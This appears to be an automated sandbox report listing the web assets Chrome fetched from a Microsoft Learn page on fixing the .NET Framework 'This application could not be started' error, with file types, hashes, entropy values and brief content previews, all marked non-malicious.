                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):13339
                                                                                Entropy (8bit):7.683569563478597
                                                                                Encrypted:false
                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):18367
                                                                                Entropy (8bit):7.7772261735974215
                                                                                Encrypted:false
                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):3130
                                                                                Entropy (8bit):4.790069981348324
                                                                                Encrypted:false
                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                Malicious:false
                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):15427
                                                                                Entropy (8bit):7.784472070227724
                                                                                Encrypted:false
                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                Category:dropped
                                                                                Size (bytes):1730619
                                                                                Entropy (8bit):5.505615568287551
                                                                                Encrypted:false
                                                                                SSDEEP:24576:qT7Z3H5dBEhjeaQzyMkinVg8qjC1JcYyOWCzE+0RlCDSB1DkCXWL/Ne2VLE0A96D:qT5H5dBEcDSB1DkCXWLVeuLE0A9CCDa
                                                                                MD5:627F36D1AC50FDA5F78E0A0FC820CCF5
                                                                                SHA1:6962206F8B7B496292205CC0FA6F7620DFD0F64B
                                                                                SHA-256:4AC295B2A0F4EC8169614DAA5A50E719267F85735A1942B13DBD1FAF860FA788
                                                                                SHA-512:1C11E78A5E6B9F0259B2BE495D23403F0A5463C1139ECF39A5D8C3AC40AC0A7E7F903B658180D19FEC6700007A492D5C097A58B0C48E5590F3DE60913F26C42A
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):47758
                                                                                Entropy (8bit):5.04838690819544
                                                                                Encrypted:false
                                                                                SSDEEP:768:6DcScfvwcwOffIYswsuKJmQG1Yn4/1ggM6F5F3MeYUS99o:6YfovOff9swsu+mQGO4/1BzRMhUe9o
                                                                                MD5:E423BF2027B2C3FB2473EBA07418FBD7
                                                                                SHA1:FC948A3A17965742E463BF216827ACCE201D8259
                                                                                SHA-256:5E73EBBEF7F8316C1852C6D78E0FC1D7E862D83E42BD18ED0B62C4B3E67F8E2F
                                                                                SHA-512:B5E2175770396F440D90313E1D040016BAA7BC0C518DFA7825BBF3E088DC899101CC0EF7B28A775DD14E33C50DF4152F86492C62FF9813E91F506F1803E13F42
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Preview:<!DOCTYPE html><html...class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"...lang="en-us"...dir="ltr"...data-authenticated="false"...data-auth-status-determined="false"...data-target="docs"...x-ms-format-detection="none">....<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />...<meta property="og:type" content="website" />...<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />.....<meta property="og:image:alt" content="Fix .NET Framework 'This application
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):16
                                                                                Entropy (8bit):3.875
                                                                                Encrypted:false
                                                                                SSDEEP:3:HMB:k
                                                                                MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                Malicious:false
                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                Preview:CgkKBw2/5iXyGgA=
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                Category:dropped
                                                                                Size (bytes):207771
                                                                                Entropy (8bit):5.4194316845132855
                                                                                Encrypted:false
                                                                                SSDEEP:3072:hAuzoOXZhSHYBdBthJd3CUMD5P55MekvFjPrYFc1Tb:h/zoV4zfqxXMeCFnYcTb
                                                                                MD5:9F127FCE3746D2B744C944488BB2F2DD
                                                                                SHA1:8EF39E285C9BE04D3A26735A7C738EFABF9E17F0
                                                                                SHA-256:BBFDC9BEFB184EF4CB2ABD0360C09D1181AEED5CFAF9C451196AFC07C56A880D
                                                                                SHA-512:4CB2340901366079C90B53FAE25E706375193717363BFC792840217FDB0C16279D0A7478E5C4EB6A595E30F3FF847235B9940ED62BE817A1EFCD3AE047B8F7BA
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):72
                                                                                Entropy (8bit):4.241202481433726
                                                                                Encrypted:false
                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                Malicious:false
                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):16915
                                                                                Entropy (8bit):5.1454972531227545
                                                                                Encrypted:false
                                                                                SSDEEP:384:cF31RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16szFrHrmFIN1G:63rlOVqnACpK3o3hhl0OU2/8BlsRw/6J
                                                                                MD5:D99DF13E2AF3BE4AAC14DF9D3F94312F
                                                                                SHA1:627CB2614558CF689B207D282BF933EECBF9552A
                                                                                SHA-256:BC774794A71CA75D065AFDDD0A188ACD991E525E4A51EFBF6A74921BD4D6DD10
                                                                                SHA-512:EEC024DC9E4565E6A1AF43F07061A4C58463A1CAE8C86DD7A641105DCD5F269B9622EFB33FEA4A364BC6EFCF8B5EFF7719F87DAFE62BB664EF2E2BB88AB5C2DD
                                                                                Malicious:false
                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                Category:downloaded
                                                                                Size (bytes):207771
                                                                                Entropy (8bit):5.4194316845132855
                                                                                Encrypted:false
                                                                                SSDEEP:3072:hAuzoOXZhSHYBdBthJd3CUMD5P55MekvFjPrYFc1Tb:h/zoV4zfqxXMeCFnYcTb
                                                                                MD5:9F127FCE3746D2B744C944488BB2F2DD
                                                                                SHA1:8EF39E285C9BE04D3A26735A7C738EFABF9E17F0
                                                                                SHA-256:BBFDC9BEFB184EF4CB2ABD0360C09D1181AEED5CFAF9C451196AFC07C56A880D
                                                                                SHA-512:4CB2340901366079C90B53FAE25E706375193717363BFC792840217FDB0C16279D0A7478E5C4EB6A595E30F3FF847235B9940ED62BE817A1EFCD3AE047B8F7BA
                                                                                Malicious:false
                                                                                URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                Category:dropped
                                                                                Size (bytes):1154
                                                                                Entropy (8bit):4.59126408969148
                                                                                Encrypted:false
                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                Malicious:false
                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:downloaded
                                                                                Size (bytes):16915
                                                                                Entropy (8bit):5.1454972531227545
                                                                                Encrypted:false
                                                                                SSDEEP:384:cF31RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16szFrHrmFIN1G:63rlOVqnACpK3o3hhl0OU2/8BlsRw/6J
                                                                                MD5:D99DF13E2AF3BE4AAC14DF9D3F94312F
                                                                                SHA1:627CB2614558CF689B207D282BF933EECBF9552A
                                                                                SHA-256:BC774794A71CA75D065AFDDD0A188ACD991E525E4A51EFBF6A74921BD4D6DD10
                                                                                SHA-512:EEC024DC9E4565E6A1AF43F07061A4C58463A1CAE8C86DD7A641105DCD5F269B9622EFB33FEA4A364BC6EFCF8B5EFF7719F87DAFE62BB664EF2E2BB88AB5C2DD
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
                                                                                Category:downloaded
                                                                                Size (bytes):32805
                                                                                Entropy (8bit):7.082331056664266
                                                                                Encrypted:false
                                                                                SSDEEP:384:ae0XJjwLfLdfp95MEaAWkCMHV8aDYYmZHk94sOWricY6AGnS74EV3rExl5SJT5hk:ae0Wlztd8h5Tc3P2Cl5SPhjakA
                                                                                MD5:64D3BE46EB793F6FE19BEE805638CB80
                                                                                SHA1:93BD75CF654214F8A76AF8E1290499147D971C5C
                                                                                SHA-256:74C048FD2C6C9516438DB1F627419A783622ABCDC0522A5C4A1A568317A3D13C
                                                                                SHA-512:4646AC163DCC465669A868003B2667752EEF8CAD1F40DBFF48C7F5D4C5F2120637F2514A0202F2008D52EDFB377D1341D1B0411E556011CE9E2DE194EE405908
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ai-skills-challenge-fall-2024.jpg
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):1478
                                                                                Entropy (8bit):5.030941252322257
                                                                                Encrypted:false
                                                                                SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/global/deprecation.js
                                                                                Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):15427
                                                                                Entropy (8bit):7.784472070227724
                                                                                Encrypted:false
                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1478
                                                                                Entropy (8bit):5.030941252322257
                                                                                Encrypted:false
                                                                                SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                Malicious:false
                                                                                Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 19360, version 1.0
                                                                                Category:downloaded
                                                                                Size (bytes):19360
                                                                                Entropy (8bit):7.98883650859826
                                                                                Encrypted:false
                                                                                SSDEEP:384:0A0OhWXsvqYnHNCyX/Bn9X5uB01I5u0gzRO4i:GOhWXsvqKNf/pue1F1QP
                                                                                MD5:74F49BCDBD13777670657D78944E97F8
                                                                                SHA1:862256ADDFC55950FA4B4DA43E5619C24722BD31
                                                                                SHA-256:1F4AA7693F801EA02E189C3B85101E1A5C24FFD6C335D54D1B212F9981EA3F05
                                                                                SHA-512:C699383350446F3F665418EDAF74E4E235532963801CE3C9FD57F49526AEB9B8FB6CB28FD9BB0A3E65A0521029B4D1821EADE0E8A5D56EEAFDCA244650DD9F8D
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/styles/docons.79a266d.e26ff38a.woff2
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):52717
                                                                                Entropy (8bit):5.462668685745912
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):52717
                                                                                Entropy (8bit):5.462668685745912
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                Malicious:false
                                                                                URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):1173007
                                                                                Entropy (8bit):5.503893944397598
                                                                                Encrypted:false
                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
                                                                                Category:dropped
                                                                                Size (bytes):32805
                                                                                Entropy (8bit):7.082331056664266
                                                                                Encrypted:false
                                                                                SSDEEP:384:ae0XJjwLfLdfp95MEaAWkCMHV8aDYYmZHk94sOWricY6AGnS74EV3rExl5SJT5hk:ae0Wlztd8h5Tc3P2Cl5SPhjakA
                                                                                MD5:64D3BE46EB793F6FE19BEE805638CB80
                                                                                SHA1:93BD75CF654214F8A76AF8E1290499147D971C5C
                                                                                SHA-256:74C048FD2C6C9516438DB1F627419A783622ABCDC0522A5C4A1A568317A3D13C
                                                                                SHA-512:4646AC163DCC465669A868003B2667752EEF8CAD1F40DBFF48C7F5D4C5F2120637F2514A0202F2008D52EDFB377D1341D1B0411E556011CE9E2DE194EE405908
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):13339
                                                                                Entropy (8bit):7.683569563478597
                                                                                Encrypted:false
                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                Category:downloaded
                                                                                Size (bytes):17174
                                                                                Entropy (8bit):2.9129715116732746
                                                                                Encrypted:false
                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
